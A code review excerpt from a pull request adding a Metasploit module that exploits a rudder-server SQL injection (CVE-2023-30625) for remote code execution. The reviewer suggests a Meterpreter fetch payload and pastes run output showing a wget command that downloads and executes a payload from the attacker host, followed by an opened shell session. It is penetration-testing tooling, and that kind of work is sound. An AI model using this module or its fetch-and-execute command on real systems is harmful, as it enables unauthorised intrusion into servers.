modules/exploits/multi/http/rudder_server_sqli_rce.rb

```diff
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Rudder Server SQLI Remote Code Execution',
+        'Description' => %q{
+          This Metasploit module exploits a SQL injection vulnerability in
+          RudderStack's rudder-server, an open source Customer Data Platform (CDP).
+          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
+          By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+          which may lead to Remote Code Execution (RCE) due to the `rudder` role
+          in PostgresSQL having superuser permissions by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balcı <egebalci@pm.me>' # msf module
+        ],
+        'References' => [
+          ['CVE', '2023-30625'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
```

Comment:
Once your branch is rebased on the latest Metasploit version, you can set this to use our latest Fetch Payload feature and get a Meterpreter session without changing that much. Please refer to the [documentation](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html) for more information.

```suggestion
            'Unix Command',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
              }
            }
          ],
```

Example output:
```
msf6 exploit(multi/http/rudder_server_sqli_rce) > exploit API_PASS=<redacted> rhosts=127.0.0.1 lhost=192.168.6.8 verbose=true fetch_srvhost=192.168.6.8 fetch_command=WGET

[*] Command to run on remote host: wget -qO ./LzxikSuOjYfV http://192.168.6.8:8080/MUbUZmtesJZBaBhmgETerw; chmod +x ./LzxikSuOjYfV; ./LzxikSuOjYfV &
[*] Fetch Handler listening on 192.168.6.8:8080
[*] HTTP server started
[*] Adding resource /MUbUZmtesJZBaBhmgETerw
[*] Started reverse TCP handler on 192.168.6.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Rudder Version: 1.2.5
[*] Detected rudder version: 1.2.5
[*] Triggering RCE via crafted SQL query...
[*] Client 192.168.6.8 requested /MUbUZmtesJZBaBhmgETerw
[*] Sending payload to 192.168.6.8 (Wget)
[*] Client 192.168.6.8 requested /MUbUZmtesJZBaBhmgETerw
[*] Sending payload to 192.168.6.8 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 192.168.6.8
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 192.168.6.8
[*] Meterpreter session 10 opened (192.168.6.8:4444 -> 192.168.6.8:52910) at 2023-07-26 16:14:58 +0200

[*] Meterpreter session 9 opened (192.168.6.8:4444 -> 192.168.6.8:52908) at 2023-07-26 16:14:58 +0200
meterpreter > getuid
Server username: postgres
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           :  (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```